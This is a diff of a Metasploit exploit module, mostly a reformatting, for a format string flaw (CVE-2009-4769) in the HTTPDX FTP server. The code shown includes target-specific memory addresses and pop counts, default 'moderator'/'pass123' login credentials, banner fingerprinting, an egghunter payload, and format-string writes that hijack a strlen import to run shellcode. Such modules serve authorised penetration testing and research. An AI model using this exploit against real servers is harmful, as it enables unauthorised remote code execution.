@@ -11,87 +11,96 @@ class MetasploitModule < Msf::Exploit::Remote
   include Msf::Exploit::FormatString
 
   def initialize(info = {})
-    super(update_info(info,
-      'Name'           => 'HTTPDX tolog() Function Format String Vulnerability',
-      'Description'    => %q{
+    super(
+      update_info(
+        info,
+        'Name' => 'HTTPDX tolog() Function Format String Vulnerability',
+        'Description' => %q{
           This module exploits a format string vulnerability in HTTPDX FTP server.
-        By sending a specially crafted FTP command containing format specifiers, an
-        attacker can corrupt memory and execute arbitrary code.
+          By sending a specially crafted FTP command containing format specifiers, an
+          attacker can corrupt memory and execute arbitrary code.
 
-        By default logging is off for HTTP, but enabled for the 'moderator' user
-        via FTP.
-      },
-      'Author'         =>
-        [
-          'jduck'   # original discovery and metasploit module
+          By default logging is off for HTTP, but enabled for the 'moderator' user
+          via FTP.
+        },
+        'Author' => [
+          'jduck' # original discovery and metasploit module
         ],
-      'References'     =>
-        [
+        'References' => [
           [ 'CVE', '2009-4769' ],
           [ 'OSVDB', '60181' ]
         ],
-      'DefaultOptions' =>
-        {
+        'DefaultOptions' => {
           'EXITFUNC' => 'process'
         },
-      'Privileged'     => true,
-      'Payload'        =>
-        {
+        'Privileged' => true,
+        'Payload' => {
           # format string max length
-          'Space'    => 1024,
+          'Space' => 1024,
           'BadChars' => "\x00\x0a\x0d\x25",
           'DisableNops'	=> true,
-          'StackAdjustment' 	=> -1500
+          'StackAdjustment' => -1500
         },
-      'Platform'       => 'win',
-      'Targets'        =>
-        [
+        'Platform' => 'win',
+        'Targets' => [
           #
           # Automatic targeting via fingerprinting
           #
-          [ 'Automatic Targeting', { 'auto' => true }  ],
+          [ 'Automatic Targeting', { 'auto' => true } ],
 
           #
           # specific targets
           #
-          [	'httpdx 1.4 - Windows XP SP3 English',
+          [
+            'httpdx 1.4 - Windows XP SP3 English',
             {
-              'NumPops' 	=> 37,
-              'Writable' 	=> 0x64f87810, 	# empty space in core.dll imports
-              'FlowHook'	=> 0x64f870e8		# core.dll import for strlen
+              'NumPops' => 37,
+              'Writable' => 0x64f87810,	# empty space in core.dll imports
+              'FlowHook'	=> 0x64f870e8	# core.dll import for strlen
             }
           ],
-          [	'httpdx 1.4.5 - Windows XP SP3 English',
+          [
+            'httpdx 1.4.5 - Windows XP SP3 English',
             {
-              'NumPops' 	=> 37,
-              'Writable' 	=> 0x64f87810, 	# empty space in core.dll imports
-              'FlowHook'	=> 0x64f870e8		# core.dll import for strlen
+              'NumPops' => 37,
+              'Writable' => 0x64f87810,	# empty space in core.dll imports
+              'FlowHook'	=> 0x64f870e8	# core.dll import for strlen
             }
           ],
-          [	'httpdx 1.4.6 - Windows XP SP3 English',
+          [
+            'httpdx 1.4.6 - Windows XP SP3 English',
             {
-              'NumPops' 	=> 37,
-              'Writable' 	=> 0x64f87810, 	# empty space in core.dll imports
-              'FlowHook'	=> 0x64f870e8		# core.dll import for strlen
+              'NumPops' => 37,
+              'Writable' => 0x64f87810,	# empty space in core.dll imports
+              'FlowHook'	=> 0x64f870e8	# core.dll import for strlen
             }
           ],
-          [	'httpdx 1.4.6b - Windows XP SP3 English',
+          [
+            'httpdx 1.4.6b - Windows XP SP3 English',
             {
-              'NumPops' 	=> 37,
-              'Writable' 	=> 0x64f87810, 	# empty space in core.dll imports
-              'FlowHook'	=> 0x64f870e8		# core.dll import for strlen
+              'NumPops' => 37,
+              'Writable' => 0x64f87810,	# empty space in core.dll imports
+              'FlowHook'	=> 0x64f870e8	# core.dll import for strlen
             }
           ],
-          [	'httpdx 1.5 - Windows XP SP3 English',
+          [
+            'httpdx 1.5 - Windows XP SP3 English',
             {
-              'NumPops' 	=> 29,
-              'Writable' 	=> 0x64f87810, 	# empty space in core.dll imports
-              'FlowHook'	=> 0x64f870e8		# core.dll import for strlen
+              'NumPops' => 29,
+              'Writable' => 0x64f87810,	# empty space in core.dll imports
+              'FlowHook'	=> 0x64f870e8	# core.dll import for strlen
             }
           ]
         ],
-      'DefaultTarget'  => 0,
-      'DisclosureDate' => '2009-11-17'))
+        'DefaultTarget' => 0,
+        'DisclosureDate' => '2009-11-17',
+        'Notes' => {
+          'Reliability' => UNKNOWN_RELIABILITY,
+          'Stability' => UNKNOWN_STABILITY,
+          'SideEffects' => UNKNOWN_SIDE_EFFECTS
+        }
+      )
+    )
 =begin
 
 NOTE: Even though all targets have the same addresses now, future targets may not.
@@ -116,10 +125,10 @@ For now, that will have to be done manually.
         # note the default user/pass
         OptString.new('FTPUSER', [ true, 'The username to authenticate as', 'moderator'], fallbacks: ['USERNAME']),
         OptString.new('FTPPASS', [ true, 'The password to authenticate with', 'pass123'], fallbacks: ['PASSWORD'])
-      ])
+      ]
+    )
   end
 
-
   def check
     connect
     disconnect
@@ -127,12 +136,11 @@ For now, that will have to be done manually.
     if banner =~ /httpdx.*\(Win32\)/
       return Exploit::CheckCode::Detected
     end
+
     return Exploit::CheckCode::Safe
   end
 
-
   def exploit
-
     # Use a copy of the target
     mytarget = target
 
@@ -176,7 +184,6 @@ For now, that will have to be done manually.
     ip_length = Rex::Socket.source_address(datastore['RHOST']).length
     num_start = ip_length + 1 + 3 + 1
 
-
     # use the egghunter!
     eh_stub, eh_egg = generate_egghunter(payload.encoded, payload_badchars, { :checksum => true })
 
@@ -187,7 +194,6 @@ For now, that will have to be done manually.
       print_status(res.strip)
     end
 
-
     # write 'writable' addr to flowhook (execute shellcode)
     # NOTE: the resulting two writes must be done at the same time
     fmtbuf = generate_fmt_two_shorts(num_start, mytarget['FlowHook'], mytarget['Writable'], mytarget)
@@ -199,7 +205,6 @@ For now, that will have to be done manually.
       print_status(res.strip)
     end
 
-
     disconnect
     handler
 
@@ -210,7 +215,6 @@ For now, that will have to be done manually.
   end
 end
 
-
 =begin
 
 also present in 1.5 (presumably all versions in between)
